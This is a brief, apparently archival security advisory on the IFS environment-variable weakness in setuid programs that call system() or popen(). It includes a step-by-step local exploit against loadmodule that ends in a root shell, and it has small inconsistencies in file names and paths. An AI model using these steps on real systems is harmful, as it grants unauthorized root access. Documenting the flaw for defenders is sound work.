COMMAND

    IFS

SYSTEMS AFFECTED

    Setuid programs using system(3) or popen(3).

PROBLEM

    By changing the IFS enviroment variable to / setuid root  programs
    that  use  system()  or  popen()  can  be  fooled into runing user
    provided programs. Example:

        % cat >~/bin/sh
        #!/bin/sh
        sh -i
        ^D
        % chmod 755 ~/bin/bin
        % setenv IFS /
        % cd ~/bin
        % /usr/openwin/bin/loadmodule /sys/syn4c/OBJ/evqmod-sun4c.o /etc/openwin/modules/evqload
        #whoami
        root

    Programs that call  other programs that  user system() or  popen()
    are also  vulnerable for  example, "vi"  execs "expreserve"  which
    calls system() to send mail.